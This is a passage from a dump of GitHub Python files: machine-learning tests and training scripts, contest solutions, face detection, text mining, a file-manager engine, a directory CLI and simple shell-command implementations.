\"float64\",\n \"shape\": [\n None,\n 1\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.REGRESSION\n assert model.save_model('./pytorch-reg')\n\n\ndef test_mnist():\n import torch\n import torch.optim as optim\n from torchvision import datasets, transforms\n from torch.optim.lr_scheduler import StepLR\n\n use_cuda = torch.cuda.is_available()\n batch_size = 64\n lr = 1.0\n gamma = 0.7\n epochs = 1\n\n torch.manual_seed(seed)\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'batch_size': batch_size}\n if use_cuda:\n kwargs.update({'num_workers': 1,\n 'pin_memory': True,\n 'shuffle': True},\n )\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n dataset1 = datasets.MNIST('./data', train=True, download=True, transform=transform)\n dataset2 = datasets.MNIST('./data', train=False, transform=transform)\n train_loader = torch.utils.data.DataLoader(dataset1, **kwargs)\n test_loader = torch.utils.data.DataLoader(dataset2, **kwargs)\n\n net = get_net().to(device)\n optimizer = optim.Adadelta(net.parameters(), lr=lr)\n\n scheduler = StepLR(optimizer, step_size=1, gamma=gamma)\n\n for epoch in range(1, epochs + 1):\n run_train(net, device, 
train_loader, optimizer)\n run_test(net, device, test_loader)\n scheduler.step()\n\n examples = enumerate(test_loader)\n batch_idx, (x_test, y_test) = next(examples)\n\n model = MetadataModel.wrap(net,\n x_test=x_test,\n y_test=y_test,\n source_object=get_net)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'][0]['shape'] == [None, 1, 28, 28]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7,\n \"type\": \"int64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float64\",\n \"shape\": [\n None,\n 10\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_net'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert model.save_model('./pytorch-mnist')\n\n\ndef run_train(model, device, train_loader, optimizer):\n import torch.nn.functional as F\n\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n\ndef run_test(model, device, test_loader):\n import torch\n import torch.nn.functional as F\n\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. 
* correct / len(test_loader.dataset)))\n\n","repo_name":"autodeployai/ai-metadata","sub_path":"test/test_pytorch.py","file_name":"test_pytorch.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27607881578","text":"K = int(input())\nlst = list(input().split())\n\nans_min = 10**10\nans_max = -10**10\n\n\ndef dfs(idx, string):\n global ans_min, ans_max\n if idx == K+1:\n ans_min = min(ans_min, int(string))\n ans_max = max(ans_max, int(string))\n return\n\n for i in range(10):\n if not visited[i]:\n if idx == 0:\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n else:\n if eval(string[idx-1] + lst[idx-1] + str(i)):\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n\nvisited = [0] * 10\ndfs(0, '')\nprint(str(ans_max).zfill(K+1))\nprint(str(ans_min).zfill(K+1))","repo_name":"nimunsang/Algorithm","sub_path":"Implementation/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9375739453","text":"from data import *\n\nimages, labels, images_test, labels_test, images_validate, labels_validate = load_data()\n\n# 3 hidden layer\n# 784 -> 40 -> 30 -> 10 -> 10\nINPUTLAYER = 784\nHIDDENLAYER1 = 40\nHIDDENLAYER2 = 30\nHIDDENLAYER3 = 20\nOUTPUTLAYER = 10\n\n# global weights and biases for each layer\nweights_in_to_h1 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER1, INPUTLAYER))\nweights_h1_to_h2 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER2, HIDDENLAYER1))\nweights_h2_to_h3 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER3, HIDDENLAYER2))\nweights_h3_to_out = np.random.uniform(-0.5, 0.5, (OUTPUTLAYER, HIDDENLAYER3))\nbias_in_to_h1 = np.zeros((HIDDENLAYER1, 1))\nbias_h1_to_h2 = np.zeros((HIDDENLAYER2, 1))\nbias_h2_to_h3 = np.zeros((HIDDENLAYER3, 1))\nbias_h3_to_out = np.zeros((OUTPUTLAYER, 1))\n\n# for plotting accuracy vs epoch\nrecord_train = []\nrecord_validate = []\nrecord_cost = []\n\n\ndef forward_propagation(image):\n # multiply weights by the input matrix: weights_in_to_h1 @ image\n # add the bias: + bias_in_to_h1\n # run it through an activation function to normalize, we are using sigmoid\n\n # Forward propagation input -> hidden1\n hidden1 = sigmoid(bias_in_to_h1 + weights_in_to_h1 @ image)\n # Forward propagation hidden1 -> hidden2\n hidden2 = sigmoid(bias_h1_to_h2 + weights_h1_to_h2 @ hidden1)\n # Forward propagation hidden2 -< hidden3\n hidden3 = sigmoid(bias_h2_to_h3 + weights_h2_to_h3 @ hidden2)\n # Forward propagation hidden3 -> output\n output = sigmoid(bias_h3_to_out + weights_h3_to_out @ hidden3)\n\n return output, hidden1, hidden2, hidden3\n\n\ndef backward_propagation(img, label, output, hidden1, hidden2, hidden3):\n # make sure we are grabbing the weights defined globally\n global weights_in_to_h1, weights_h1_to_h2, weights_h2_to_h3, weights_h3_to_out\n global bias_in_to_h1, bias_h1_to_h2, bias_h2_to_h3, bias_h3_to_out\n\n # TODO: employ validation tester results to this instead\n # Backpropagation output -> hidden3 (cost function derivative)\n delta_output = output - label\n weights_h3_to_out += -learn_rate * delta_output @ np.transpose(hidden3)\n bias_h3_to_out += -learn_rate * delta_output\n\n # Backpropagation hidden3 -> hidden2 (activation function derivative)\n delta_hidden3 = np.transpose(weights_h3_to_out) @ delta_output * deriv_sigmoid(hidden3)\n weights_h2_to_h3 += -learn_rate * delta_hidden3 @ 
np.transpose(hidden2)\n bias_h2_to_h3 += -learn_rate * delta_hidden3\n\n # Backpropagation hidden2 -> hidden1 (activation function derivative)\n delta_hidden2 = np.transpose(weights_h2_to_h3) @ delta_hidden3 * deriv_sigmoid(hidden2)\n weights_h1_to_h2 += -learn_rate * delta_hidden2 @ np.transpose(hidden1)\n bias_h1_to_h2 += -learn_rate * delta_hidden2\n\n # Backpropagation hidden1 -> input (activation function derivative)\n delta_hidden1 = np.transpose(weights_h1_to_h2) @ delta_hidden2 * deriv_sigmoid(hidden1)\n weights_in_to_h1 += -learn_rate * delta_hidden1 @ np.transpose(img)\n bias_in_to_h1 += -learn_rate * delta_hidden1\n\n\n# main training code ----------------------------------------------------------\nlearn_rate = LEARNING_RATE\nepochs = EPOCHS\nnum_correct = 0\nfor epoch in range(epochs):\n error_avg_sum = 0\n for img, label in zip(images, labels):\n # needed to change from vector to a matrix\n img.shape += (1,)\n label.shape += (1,)\n\n # Forward propagation -----------------------------\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n # Loss + Error calculation\n error_avg_sum += mean_squared_error(output, label)[0]\n num_correct += int(np.argmax(output) == np.argmax(label))\n\n # Backpropagation ---------------------------------\n backward_propagation(img, label, output, hidden1, hidden2, hidden3)\n\n # Show accuracy for this epoch\n accuracy = round((num_correct / images.shape[0]) * 100, 2)\n num_correct = 0\n # Calculate average loss for this epoch\n error_rate = round((error_avg_sum / SPLIT_TRAIN_SIZE) * 100, 2)\n # Validate against validation set for this epoch\n sum_of_correct_preds = tester(images_validate, labels_validate, forward_propagation)\n validate_length = len(images_validate)\n validation_accuracy = round(sum_of_correct_preds / validate_length * 100, 2)\n print(f\"{epoch+1}\\tAcc: {accuracy}%\\tValidation: {validation_accuracy}%\\tAvg Loss: {error_rate}\")\n\n record_train.append((epoch, accuracy))\n record_validate.append((epoch, validation_accuracy))\n record_cost.append((epoch, error_rate))\n\n\n\n# Testing on test set\nsum_of_correct_preds = tester(images_test, labels_test, forward_propagation)\ntest_length = len(images_test)\ntesting_set_acc = round(sum_of_correct_preds / test_length * 100, 2)\nprint(f\"Testing set accuracy: {testing_set_acc}%\")\n\n\n\nchat_bot_dict = {\n 1: 'DEEZ NODES SAY THAT',\n 2: '...',\n 3: 'HELLO FRIEND!',\n 4: 'USER, I BELIEVE'\n}\n\n# Show results ctrl-c out or 20 times\n#while True:\nif SHOWTEST == True:\n for i in range(20):\n #index = int(input(\"Enter a number (0 - 59999): \"))\n index = np.random.randint(0, len(img))\n img = images[index]\n plt.imshow(img.reshape(28, 28), cmap=\"Greys\")\n\n img.shape += (1,)\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n text = chat_bot_dict[np.random.randint(1, 5)]\n plt.title(f\"{text} THE ANSWER IS: {output.argmax()} :D\")\n plt.show()\n","repo_name":"afnleaf/MNIST_NeuralNet","sub_path":"nn_3layer.py","file_name":"nn_3layer.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18516507496","text":"import cv2\r\n\r\ncas_classifier = cv2.CascadeClassifier('HAARCascadeFaceDetection/haarcascade_frontalface_default.xml')\r\ncap = cv2.VideoCapture(0)\r\n# Capture frame-by-frame\r\nwhile True:\r\n ret, frame = cap.read()\r\n gray = cv2.cvtColor(frame, 0)\r\n detections = cas_classifier.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5)\r\n 
if(len(detections) > 0):\r\n (x,y,w,h) = detections[0]\r\n frame = cv2.rectangle(frame,(x,y),(x+w,y+h),(150,0,150),2)\r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n \tbreak\r\n\r\n#release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ManavTriesStuff/FaceDetection","sub_path":"FaceDetect.py","file_name":"FaceDetect.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42634689727","text":"from turtle import *\ntela = Screen()\ncao = Turtle()\ncao.color(\"red\")\ncao.forward(70)\ncao.right(90)\ncao.forward(200)\ngato = Turtle()\ngato.color(\"blue\")\ngato.right(90)\ngato.forward(200)\ngato.left(90)\ngato.forward(70)\nlebre = Turtle()\nlebre.color(\"green\")\nlebre.forward(120)\nlebre.right(90)\nlebre.forward(200)\nlebre.right(90)\nlebre.forward(50)\npangolim = Turtle()\npangolim.color(\"yellow\")\npangolim.right(90)\npangolim.forward(240)\npangolim.left(90)\npangolim.forward(70)\npangolim.left(90)\npangolim.forward(40)\n","repo_name":"in1076/in1076.github.io","sub_path":"_site/programas/01_caotaruga.py","file_name":"01_caotaruga.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43730117002","text":"import pandas as pd\nimport string\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nimport wordcloud\nfrom collections import Counter\nimport os\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer, SnowballStemmer\n\n\n# Read the data\ndf = pd.read_csv('final.csv')\n\n\nnltk.data.path.append('/home/mahshid/nltk_data/corpora/stopwords')\n\n# Download the stopwords corpus from NLTK\nstop_words = set(stopwords.words('english'))\nnltk.download('punkt')\nnltk.download('wordnet')\n\n# Define a function to preprocess text\ndef preprocess_text(text):\n\n # Convert to lowercase\n text = text.lower()\n\n # Tokenize the text into words\n words = word_tokenize(text)\n\n\n # Remove Unicode Characters\n text = re.sub(r\"(@\\[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)|^rt|http.+?\", \" \", text)\n text = re.sub(r\"(@\\[A-Za-z0-9]|^rt|http.+?)|(git-svn-id)|(://svn.apache.org/repos/asf/jakarta)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\",\" \",text)\n \n # Remove Digit\n new_str = \"\"\n\n for c in text:\n if c.isdigit():\n new_str += \" \"\n else:\n new_str += c\n\n text = new_str\n\n text = \" \".join([word for word in text.split() if len(word) > 2])\n\n\n p = [\n \"fbbffaedef\", \"sandbox\", \"trunk\", \"license\" , \"bcel\" , \"vfs\" , \"apache\" , \"contact\" , \"address\", \"svn\", \"https\", \"www\", \"org\", \"com\",\n \"net\", \"http\", \"id\", \"gitsvnid\", \"tags\", \"branches\", \"jakarta\", \"codec\", \"commons\",\"git\", \"license\",\n \"ffaedef\", \"ffa\", \"edef\", \"and\", \"for\", \"the\"]\n\n text = list(filter(lambda x: x not in p, text.split()))\n \n\n\n # Remove stop wordsze(text)\n words = [word for word in str(text).split() if word not in stop_words]\n \n # Stem the words\n stemmer = SnowballStemmer('english')\n words = [stemmer.stem(word) for word in words]\n\n \n # Lemmatize the words\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(word) for word in words]\n\n\n text = \" \".join(text)\n return text\n\n\n# Create a new dataframe for commits with improved 
readability\ndf_improved = df[df['readability'] > 0].copy()\n# Preprocess the commit messages in the improved readability dataframe\ndf_improved['preprocessed_commit_msg'] = df_improved['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_improved['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for improved readability\nimproved_wordcloud = wordcloud.WordCloud(collocations = False, background_color='white').generate(' '.join(df_improved['preprocessed_commit_msg']))\nplt.imshow(improved_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n\n# Create a new dataframe for commits with decreased readability\ndf_decreased = df[df['readability'] < 0].copy()\n# Preprocess the commit messages in the decreased readability dataframe\ndf_decreased['preprocessed_commit_msg'] = df_decreased['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_decreased['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for decreased readability\ndecreased_wordcloud = wordcloud.WordCloud(collocations= False, background_color='white').generate(' '.join(df_decreased['preprocessed_commit_msg']))\nplt.imshow(decreased_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n","repo_name":"MoonGirl99/Code-Readability-Analysis-and-Prediction","sub_path":"text mining.py","file_name":"text mining.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40754974126","text":"def remove_duplicate(lst):\r\n j = 0\r\n lst.sort()\r\n for i in range(len(lst) - 1):\r\n if lst[i] != lst[i + 1]:\r\n lst[j] = lst[i]\r\n j += 1\r\n lst[j] = lst[-1]\r\n for _ in range(len(lst) - j - 1):\r\n lst.pop()\r\n\r\nlst1 = [2,2,2,2,2]\r\nremove_duplicate(lst1)\r\nprint(lst1)\r\n\r\nlst2 = [5,2,3,6,4,2,5,4,3,7,8,7,6,7,8,9,4,5,7,2]\r\nremove_duplicate(lst2)\r\nprint(lst2)","repo_name":"ShangZhao2000/algorithms","sub_path":"remove_duplicate.py","file_name":"remove_duplicate.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73315649928","text":"from __future__ import absolute_import, unicode_literals\n\nfrom .nomenclature import AirProperties, RefProperties\nfrom .safeprop import airprop, phase, refprop\n\n__banner__ = r\"\"\"\n ____ ___ ___\n / __/__ _/ _/__ / _ \\_______ ___\n _\\ \\/ _ `/ _/ -_) ___/ __/ _ \\/ _ \\\n/___/\\_,_/_/ \\__/_/ /_/ \\___/ .__/\n /_/ by Andrew Hjortland\n\"\"\"\n\n__title__ = 'safeprop'\n__summary__ = 'Wrappers for CoolProp for safe property calculations.'\n__uri__ = 'https://github.com/ahjortland/safeprop'\n\n__version__ = '0.0.1'\n\n__author__ = 'Andrew Hjortland'\n__email__ = 'andrew.hjortland@gmail.com'\n\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2016 Andrew 
Hjortland'\n","repo_name":"abahman/safeprop","sub_path":"safeprop/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28666229888","text":"import sys\n\nn = int(sys.stdin.readline())\nwords = [input() for _ in range(n)]\n\n# 중복제거\nwords = list(set(words))\n\nwords.sort(key=lambda x:[len(x), x])\n\nfor word in words:\n print(word)\n\n# https://www.acmicpc.net/problem/1181","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/12_sort/P08_1181.py","file_name":"P08_1181.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9436022445","text":"data ={1:'Navin',2:'kiran',4:'Harsh'}\n#print(data[1])\n#print(data.get(3))\n#print(data.get(2,'Not found'))\n#print(data.get(3,'Not found'))\nkeys=['Navin','kiran','Harsh']\nvalues=['JS','Python','Java']\ndatas=dict(zip(keys,values))#zip() in python can be used to join two files\n#print(datas)\n#print(datas['kiran'])\ndatas['Monica']=['CS']\n#print(datas['Monica'])\n#print(datas)\nprogL={'JS':'Atom','CS':'VS','Python':['Pycharm','Spyder'],'Java':{'JavaSE':'Netbeans','JavaEE':'Eclipse'}}\n#print(progL['Python'][1])\n#print(progL['Java']['JavaSE'])\ndata2=data.copy()\ndel data2[2]\n#print(data2)\n#print(data)\ndata2.update({3:'Neha'})#update() function is used to add new items to a dictionary\n#print(data2.items())\n#print(data2.keys())\nprint(data2.values())\n\n\n","repo_name":"Nirvik-Sarkar/Python-tutorial","sub_path":"Dictionary.py","file_name":"Dictionary.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28438997520","text":"\"\"\"\nDetermines commands to be run in order to update the original directory and match\nthe state of the edit directory.\n\"\"\"\nfrom roamer.command import Command\nfrom roamer import record\nfrom roamer.entry import Entry\nfrom roamer.directory import Directory\n\nclass Engine(object):\n def __init__(self, original_dir, edit_dir):\n self.original_dir = original_dir\n self.edit_dir = edit_dir\n self.commands = []\n\n def compile_commands(self):\n self.compare_dirs()\n self.new_entries()\n self.handle_unknown_digests()\n self.save_copy_over_files_to_trash()\n\n def compare_dirs(self):\n for digest, original_entry in self.original_dir.entries.items():\n new_entries = self.edit_dir.find(digest)\n if new_entries is None:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n continue\n found_original = False\n for new_entry in new_entries:\n if new_entry.name == original_entry.name:\n found_original = True\n else:\n self.commands.append(Command('cp', original_entry, new_entry))\n if not found_original:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n\n def new_entries(self):\n add_blank_entries = self.edit_dir.find(None)\n if add_blank_entries:\n for entry in add_blank_entries:\n self.commands.append(Command('touch', entry))\n\n def handle_unknown_digests(self):\n unknown_digests = set(self.edit_dir.entries.keys()) - set(self.original_dir.entries.keys())\n\n for digest in filter(None, unknown_digests):\n entries = load_entries(filter_dir=self.original_dir)\n trash_entries = load_entries(trash=True)\n outside_entry = entries.get(digest) or trash_entries.get(digest)\n if outside_entry is None:\n raise Exception('digest %s not found' % 
digest)\n\n for entry in self.edit_dir.find(digest):\n new_entry = Entry(entry.name, self.original_dir)\n self.commands.append(Command('cp', outside_entry, new_entry))\n\n def save_copy_over_files_to_trash(self):\n trash_entries = [c.first_entry for c in self.commands if c.cmd == 'roamer-trash-copy']\n copy_over_entires = [c.second_entry.name for c in self.commands if c.cmd == 'cp']\n for entry in trash_entries:\n if entry.name not in copy_over_entires:\n self.commands.append(Command('rm', entry))\n\n def commands_to_str(self):\n string_commands = [str(command) for command in sorted(self.commands)]\n # sort so that cp comes first. Need to copy before removals happen\n return '\\n'.join(string_commands)\n\n def run_commands(self):\n return [command.execute() for command in sorted(self.commands)]\n\n\ndef load_entries(**kwargs):\n dictionary = {}\n for row in record.load(**kwargs):\n entry = Entry(row['name'], Directory(row['path'], []), row['digest'])\n dictionary[row['digest']] = entry\n return dictionary\n","repo_name":"abaldwin88/roamer","sub_path":"roamer/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"16"} +{"seq_id":"6889189628","text":"import argparse\nimport sys\n\nfrom cryptopyutils import dirs\n\n\ndef main():\n \"\"\"Dirs Manipulation CLI\"\"\"\n parser = argparse.ArgumentParser(description=\"DIRECTORY MANIPULATION\")\n parser.add_argument(\"action\", choices=[\"mkdir\", \"rmdir\"], help=\"Action\")\n parser.add_argument(\"dir\", help=\"Directory\")\n args = parser.parse_args()\n if args.action == \"mkdir\":\n dirs.mkdir(args.dir)\n print(\"Created folder : %s\" % args.dir)\n elif args.action == \"rmdir\":\n # prevent accidental system damage\n if args.dir in [\n \"/\",\n \"/etc\",\n \"/bin\",\n \"/boot\",\n \"/dev\",\n \"/home\",\n \"/init\",\n \"/lib\",\n \"/lib32\",\n \"/lib64\",\n \"/libx32\",\n \"/lost+found\",\n \"/media\",\n \"/mnt\",\n \"/opt\",\n \"/proc\",\n \"/root\",\n \"/run\",\n \"/sbin\",\n \"/snap\",\n \"/srv\",\n \"/sys\",\n \"/tmp\",\n \"/usr\",\n \"/var\",\n \"~\",\n \"$HOME\",\n ]:\n print(\"Cannot remove system or home directories\")\n sys.exit(1)\n # remove\n dirs.rmdir(args.dir)\n print(\"Removed folder : %s\" % args.dir)\n else:\n print(\"Command not supported\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dheurtev/cryptopyutils","sub_path":"src/cryptopyutils/cli/dirs.py","file_name":"dirs.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14131479318","text":"import re\nimport os\nfrom os import listdir\nimport glob\n\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\n\nclass Application(ABC):\n \"\"\"\n Application is an abstract base class for all applications to inherit from\n It takes in arguments and returns the output ready for the output stream\n \"\"\"\n\n @abstractmethod\n def exec(self, args) -> List[str]:\n pass\n\n def raise_error(self, message, type, output) -> None:\n if self.unsafe:\n output.append(message + \"\\n\")\n else:\n if type == \"file_not_found\":\n raise FileNotFoundError(message)\n elif type == \"not_directory\":\n raise NotADirectoryError(message)\n elif type == \"value\":\n raise ValueError(message)\n elif type == \"type\":\n raise TypeError(message)\n else:\n raise RuntimeError(message)\n\n\nclass Pwd(Application):\n \"\"\"\n Pwd implements the 'pwd' shell 
function\n It outputs the current working directory followed by a newline.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> str:\n return os.getcwd() + \"\\n\"\n\n\nclass Cd(Application):\n \"\"\"\n Cd implements the 'cd' shell function\n It changes the current working directory.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0 or len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n if not os.path.exists(args[0]):\n self.raise_error(\n f\"No such directory: {args[0]}\",\n \"not_directory\",\n output\n )\n else:\n os.chdir(args[0])\n\n return output\n\n\nclass Ls(Application):\n \"\"\"\n Ls implements the 'ls' shell function\n Lists the content of a directory.\n It prints list of files and directories\n separated by tabs and followed by a newline.\n Ignores files and directories whose names start with '.' .\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n ls_dir = os.getcwd()\n elif len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n ls_dir = args[0]\n else:\n ls_dir = args[0]\n if not os.path.exists(ls_dir):\n self.raise_error(\n f\"No such directory: {ls_dir}\",\n \"not_directory\",\n output\n )\n else:\n for f in listdir(ls_dir):\n if not f.startswith(\".\"):\n output.append(f + \"\\n\")\n\n return output\n\n\nclass Cat(Application):\n \"\"\"\n Cat implements the 'cat' shell function\n It concatenates the content of given files\n and prints to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n self.raise_error(\"No file specified\", \"type\", output)\n return output\n for a in args:\n if \"#STDIN#\" in a:\n f = a[1:]\n for x in f:\n output.append(x)\n else:\n if not os.path.exists(a):\n self.raise_error(\n f\"No such file or directory: {a}\",\n \"file_not_found\",\n output\n )\n else:\n with open(a) as f:\n output.append(f.read())\n\n if output[-1][-2:] != \"\\n\":\n output.append(\"\\n\")\n return output\n\n\nclass Echo(Application):\n \"\"\"\n Echo implements the 'echo' shell function\n It prints its args seperated by spaces\n and followed by newline to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> str:\n return \" \".join(args) + \"\\n\"\n\n\nclass Head(Application):\n \"\"\"\n Head implements the 'head' shell function\n Prints the first N lines of a given file or stdin\n If < N lines, it prints only existing lines without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n for i in range(0, min(len(lines), num_lines)):\n output.append(lines[i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such 
file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n for i in range(0, min(len(lines), num_lines)):\n if i == len(lines) - 1:\n output.append(lines[i] + \"\\n\")\n else:\n output.append(lines[i])\n\n return output\n\n\nclass Tail(Application):\n \"\"\"\n Tail implements the 'tail' shell function\n Prints the last N lines of a given file or stdin\n If < N lines, it prints only existing lines\n without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n display_length = min(len(lines), num_lines) + 1\n for i in range(0, display_length):\n output.append(lines[len(lines) - display_length + i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n display_length = min(len(lines), num_lines)\n for i in range(0, display_length):\n if i == display_length - 1:\n output.append(\n lines[len(lines) - display_length + i]\n + \"\\n\"\n )\n else:\n output.append(\n lines[len(lines) - display_length + i]\n )\n\n return output\n\n\nclass Grep(Application):\n \"\"\"\n Grep implements the 'grep' shell function\n It searches for lines containing a match to specified pattern\n Output of command is the list of lines found\n Each line is followed by a newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) < 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n\n pattern = args[0]\n files = args[1:]\n for file in files:\n if \"#STDIN#\" in file:\n file = file[1]\n for line in file.split(\"\\n\"):\n if line != \"\":\n if re.match(pattern, line):\n output.append(line + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n 